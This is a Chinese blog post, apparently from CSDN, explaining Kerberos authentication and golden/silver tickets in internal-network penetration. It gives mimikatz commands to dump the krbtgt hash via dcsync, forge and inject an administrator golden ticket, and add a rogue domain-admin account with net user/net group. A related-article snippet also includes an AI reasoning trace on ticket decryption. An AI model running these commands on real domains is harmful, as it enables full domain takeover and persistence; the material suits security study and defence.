kerberos协议&黄金票据白银票据

原创已于 2024-03-19 17:29:34 修改 · 581 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#安全

于 2024-03-19 17:07:56 首次发布

内网渗透专栏收录该内容

3 篇文章

订阅专栏

本文介绍了内网渗透中如何使用Kerberos协议进行三方认证，包括通信过程图解，黄金票据和白银票据的应用，以及实战中如何利用Mimikatz工具生成、管理及执行非法操作，如获取NTLM哈希和添加域管理员账户。

一、名词解释

在内网渗透过程中，一些需要三方认证的场合就需要使用kerberos协议。

kerberos的前身是cerberos（地狱三头犬），很形象生动地描述了三方认证的这个场景。

二、通信过程图解

三、黄金票据&白银票据使用前提

四、实战中常用工具

cs、mimikatz等

mimikatz使用方法：

1.在普通域用户中使用mimikatz生成黄金票据.kirbi文件并保存

mimikatz log "lsadump::dcsync /domain:xiusafe /user:krbtgt"//导出NTLM哈希

kerberos::golden /user:administrator /domain:xxx.com /sid:S-1-5-21-3818247987-2711466351-3365387365 /krbtgt:5eadd5a4f3a4861f8e887310db890002 /ticket:ticket.kirbi

/user：需要伪造的域管理员用户

/domain：域名称

/sid：SID值，（这里要是使用系统命令的话抓到是这样的SID，最后面的值代表着这个账号的SID值，注意是去掉最后一个-后面的值！）

/krbtgt：krbtgt的HASH值

/ticket：生成的票据名称

2.清除历史票据

kerberos::purge   \\清除票据
kerberos::tgt     \\查看票据

3.导入票据

kerberos::ptt ticket.kirbi

4.非法操作（以创建域管理员为例）

net user a !@#qwe123 /add /domain
net group "domain admins" a /add /domain

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

codeZMJ

关注关注

13
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

红队内网攻防渗透：内网渗透之内网对抗：权限维持篇&内网AD域&Kerberos点&黄金票据&白银票据&钻石票据&蓝宝石票据

HACKONE的博客

06-25

781

蓝宝石票据与钻石票据类似，票据不是伪造的，而是通过请求后获得的合法票据。在蓝宝石票据中，高权限用户PAC是通过S4U2Self+U2U获得的，然后该PAC会替换原来的PAC，由于该票据是完全合法元素组合起来的，所以是最难检测的票据。白银票据是伪造的 Kerberos Ticket Grant Service （TGS）票证，银票仅允许攻击者伪造特定服务的票证授予服务（TGS）票据。白银票据所需的利用条件和黄金票据是相同的，只是秘钥换成了对应服务的机器账户 Hash(尾部带$的均为机器账户)

三步轻松理解Kerberos协议

热门推荐

11-02

4万+

Kerberos是一种身份验证协议，它作为一种可信任的第三方认证服务，通过使用对称加密技术为客户端/服务器应用程序提供强身份验证。在域环境下，AD域使用Kerberos协议进行验证，熟悉...

参与评论您还未登录，请先登录后发表或查看评论

kerberos认证原理_kerberos 协议初探

weixin_39757212的博客

12-03

360

kerberos原理一个客户端要访问某个服务时，先要到KDC去认证自己，并获得访问票据TGT 然后客户端再拿着这个访问票据到自己真实想要访问的服务去获得访问授权，然后真实的进行访问在kerberos中，KDC有两部分组成：Authentication Server，用来认证用户，即验证用户存在，且密码正确Ticket-Granting Service，用来给客户端生成，可以访问客户端想...

kerberos 票据_域渗透 | 白银票据利用

weixin_33425215的博客

12-25

377

目录0x01 介绍0x02 白银票据利用0x01 介绍之前，我们已经详细说过Kerberos认证的流程，这次我们就来说说如何对其进行利用，这次主要说的是白银票据伪造（Silver Tickets）白银票据伪造利用的是Kerberos认证中的第三个步骤，在第三步的时候，client会带着ticket向server的某个服务进行请求，如果验证通过就可以访问server上的指定服务了，这里ticket的...

3.4 Golden Ticket黄金票据制作原理及利用方式

GloryGod的博客

08-24

637

krbtgt用户，是系统在创建域时自动生成的一个帐号，其作用是密钥分发中心的服务账号，其密码是系统随机生成的，无法登录主机。

详细讲解kerberos认证全过程、黄金、白银票据

qq_63217130的博客

08-18

3493

当TGS接收到请求之后，会检查自身是否存在客户端请求的服务，如果存在就会拿ktbtgt hash解密TGT（由于TGS是在DC上的，所有具有krbtgt的hash），解密到的信息中包含了login session key，别忘了客户端发过来的时间戳就是利用login session key加密的，此时就可以用其解密获取到时间戳了，然后验证时间戳。只要在TGT过期之前，可以直接请求TGS申请服务票据，而不用在每次访问服务的时候都向AS请求TGT，减少了与AS的通信，提高了系统的性能和效率。

Kerberos 认证、黄金票据、白银票据

weixin_51559599的博客

11-29

937

在实际环境中，有各种各样的服务都需要进行认证，需要频繁输入密码进行认证，不仅繁琐，而且频繁传输密码加大了出现中间人劫持等安全风险。服务器持有 TGS 颁发的票据后，携带票据访问相应的服务可获取响应的服务权限。AS（Authentication Service）所在的服务器存储了用户凭证，用户输入账户密码进行认证成功后，AS 向用户颁发。（身份票据），用户获取 TGT 后，凭借 TGT 即可向 TGS 申请各种服务票据（ST），用来获取各种服务的权限。白银票据就是伪造了 Kerberos 中的服务票据。

Kerberos认证以及黄金票据白银票据的简单介绍

Reset

08-21

1355

Kerberos是一种网络身份认证的协议，协议设计目的是通过使用秘钥加密技术为客户端/服务器应用程序提供强身份验证，保护服务器防止错误的用户使用，同时保护它的用户使用正确的服务器，即支持双向验证。Kerberos协议的整个认证过程的实现不依赖于主机操作系统的认证，无需基于主机地址的信任，不要求网络上所有主机的物理安全，并假定网络上传送的数据包可以被任意的读取、修改和插入数据。简而言之，Kerberos作为一种可信任的第三方认证服务，通过传统的密码技术（共享密钥）执行认证服务。

kerberos认证及黄金票据与白银票据

qq_64951792的博客

05-22

1375

kerberos认证过程、黄金票据、白银票据

黄金票据&&白银票据&&钻石票据&&蓝宝石票据利用复现

最新发布

chinese_cabbage0的博客

06-30

571

黄金票据&&白银票据&&钻石票据&&蓝宝石票据利用复现。

解析：Kerberos、黄金票据和白银票据

Sgirll的博客

07-15

1492

是指攻击者获取了合法用户的TGT（Ticket Granting Ticket）的信息，然后对TGT进行篡改以生成伪造的服务票据（TGS票据）。白银票据伪装成合法的TGS票据，用于访问特定的服务，但与黄金票据不同，白银票据只能访问被篡改的服务，无法获得对整个域的完全控制。服务访问：用户使用TGS票据向目标服务发送请求，目标服务使用TGS的私有秘钥解密票据并验证用户的身份。服务票据的颁发：TGS验证TGT，并为用户生成一个服务票据（TGS票据），该票据包含有关用户和目标服务的信息，并用TGS的私有秘钥加密。

kerberos、黄金票据、白银票据

m0_73826804的博客

02-20

1563

白银票据：实际就是在抓取到了域控服务hash的情况下，在client端以一个普通域用户的身份生成TGS票据，并且是针对于某个机器上的某个服务的，生成的白银票据,只能访问指定的target机器中指定的服务。/sid：SID值，（这里要是使用系统命令的话抓到是这样的SID，最后面的值代表着这个账号的SID值，注意是去掉最后一个-后面的值！黄金票据：是直接抓取域控中ktbtgt账号的hash，来在client端生成一个TGT票据，那么该票据是针对所有机器的所有服务。白银票据就是伪造的ST，TGS返回的票据。

黄金票据复现

cxy020的博客

04-03

955

通常这将是根域Enterprise Admins组的“S-1-5-21-1473643419-774954089-5872329127-519”值。/ groups（可选）---用户所属的组RID（第一组是主组）。/ sid ----域的SID,在这个例子中：“S-1-5-21-1473643419-774954089-2222329127”使用黄金票据可以在没有AS-REQ或AS-REP（Kerberos认证的前两步）通信的情况下，向域控制器请求服务票据。/ id（可选） - 用户RID。

黄金票据和白银票据详解

故事讲予风听

06-22

6340

在 Windows 系统中，存在许多突破用户权限或绕过系统保护机制的漏洞，攻击者可以通过利用这些漏洞，提升自己的权限并获取黄金票据。 Golden Ticket是通过伪造的TGT（由身份认证服务授予的票据，用于身份认证，存储在内存，默认有效期为10小时），因为只要有了高权限的TGT，那么就可以发送给TGS（票据授予服务）换取任意服务的ST。每个用户的Ticket都是由krbtgt的密码Hash来生成的，那么，我们如果拿到了krbtgt的密码Hash，其实就可以伪造任意用户的TICKET，

Kerberos的黄金票据详解

weixin_30642267的博客

12-27

1236

0x01黄金票据的原理和条件黄金票据是伪造票据授予票据（TGT），也被称为认证票据。如下图所示，与域控制器没有AS-REQ或AS-REP（步骤1和2）通信。由于黄金票据是伪造的TGT，它作为TGS-REQ的一部分被发送到域控制器以获得服务票据。 Kerberos黄金票据是有效的TGT Kerberos票据，因为它是由域Kerberos帐户（KRBTGT）加密和签名的。TGT仅用...

域渗透之（黄金票据利用）

cj_Hydra's Blog

02-13

3310

前言：这里先介绍下Kerberos协议： Kerberos是一种由MIT（麻省理工大学）提出的一种网络身份验证协议。它旨在通过使用密钥加密技术为客户端/服务器应用程序提供强身份验证。在Kerberos协议中主要是有三个角色的存在： 1：访问服务的Client（用户的机器客户端） 2：提供服务的Server（服务端） 3：KDC（Key Distribution Center）密钥分发中心其中K...

kerberos 票据_黄金票据（Golden Ticket）攻击

weixin_32252929的博客

12-25

2437

渗透攻击红队一个专注于红队攻击的公众号大家好，这里是渗透攻击红队的第 37 篇文章，本公众号会记录一些我学习红队攻击的复现笔记(由浅到深)，不出意外每天一更黄金票据在渗透测试过程中，攻击者往往会给自己留下多条进入内网的通道，如果我们忘记将 krbtgt 账号重置，攻击者就能快速重新拿到域控制器的权限。假设域内存在一个 SID 为 502 的域账号 krbtgt 。krbtgt 是 K...

kerberos协议

lovebomei的博客

04-04

2156

KDC 全称：key distributed center 作用：整个安全认证过程的票据生成管理服务，其中包含两个服务，AS和TGS AS 全称：authentication service 作用：为client生成TGT的服务 TGS 全称：ticket granting service 作用：为client生成某个服务的ticket AD 全称：account databas...

kerberos 票据_域渗透之黄金票据的实际利用

weixin_39861905的博客

12-25

583

先介绍下Kerberos协议：Kerberos是一种由MIT(麻省理工大学)提出的一种网络身份验证协议。它旨在通过使用密钥加密技术为客户端/服务器应用程序提供强身份验证。在Kerberos协议中主要是有三个角色的存在：1：访问服务的Client(用户的机器客户端)2：提供服务的Server(服务端)3：KDC(Key Distribution Center)密钥分发中心其中KDC服务默认会安装在一...

Kerberos票据解密

03-26

<think>嗯，用户想了解Kerberos票据解密的相关内容。首先，我需要回忆一下Kerberos协议的基本流程。Kerberos是一种网络认证协议，使用票据来允许节点在非安全网络中证明身份，主要由密钥分发中心（KDC）、客户端和服务端组成。票据分为TGT（Ticket Granting Ticket）和Service Ticket两种，分别用于获取服务票据和访问具体服务。用户提到的是票据解密，这可能涉及到票据的结构以及加密方式。Kerberos票据在传输过程中是加密的，只有特定的实体才能解密。比如，TGT是使用KDC的密钥加密的，而服务票据则是使用服务密钥加密的。因此，解密票据通常需要相应的密钥。接下来要考虑用户可能的意图。他们可能对Kerberos的安全机制感兴趣，或者想了解如何解密票据，比如在渗透测试或系统管理中遇到的场景。需要区分合法解密和未经授权的解密，强调合法性和权限的重要性，避免提供可能被滥用的信息。需要解释Kerberos票据的结构，包括加密部分使用的算法，比如AES或RC4-HMAC。同时，说明在正常流程中，客户端和服务端如何通过共享的密钥来解密票据。例如，服务端使用自己的长期密钥解密服务票据，获取会话密钥，进而验证客户端的身份。可能还需要提到攻击向量，比如黄金票据和白银票据，这些涉及伪造票据的攻击手段，但需注意在介绍时强调这些是安全威胁，用于增强防御意识，而非操作指导。用户可能存在的疑问点包括：如何获取解密所需的密钥？解密后的票据内容是什么？实际应用场景有哪些？需要逐一解答，但避免深入技术细节导致信息过载。最后，确保回答符合系统级指令，正确使用LaTeX格式，如加密过程用$encrypt_{key}(data)$，解密函数用$decrypt_{key}(ciphertext)$等，保持结构清晰，分步骤解释。</think>Kerberos票据解密涉及Kerberos协议的核心安全机制，以下是分步说明： 1. **Kerberos票据结构** 票据主要包含： $$Ticket = encrypt_{K_{server}}(Session\ Key, Client\ Info, Timestamp, ...)$$ 其中： - $K_{server}$是服务密钥（长期密钥的哈希值） - 加密算法通常为AES或RC4-HMAC 2. **合法解密流程** a. **服务端解密**：当服务端收到客户端提交的服务票据时，使用自己的$K_{server}$解密票据： $$decrypt_{K_{server}}(Ticket) \Rightarrow Session\ Key$$ b. **客户端验证**：客户端使用$Session\ Key$解密服务端返回的验证信息 3. **密钥获取途径** - 合法场景：服务端从KDC数据库获取自己的$K_{server}$ - 渗透测试场景： - 通过域控制器提取krbtgt账户的NTLM哈希（需域管理员权限） - 使用mimikatz等工具导出内存中的密钥 4. **解密后的票据内容** 成功解密后包含： - 客户端主体名称 - 会话密钥$Session\ Key$ - 票据有效期（开始/结束时间） - 授权数据（用户组信息等） 5. **安全注意事项** - Kerberos使用$encrypt-then-MAC$结构保证完整性 - 票据默认存活时间10小时（可配置） - 防范黄金票据攻击需保护krbtgt账户 - 检测异常需监控：异常时间戳、重复票据号等 6. **典型工具示例** ```bash # 使用Impacket解密票据 ticketConverter administrator.ccache administrator.kirbi # 使用klist查看缓存票据 klist -l -c /tmp/krb5cc_1000 ``` 重要提示：票据解密操作应严格在授权范围内进行，非授权解密可能违反计算机安全相关法律。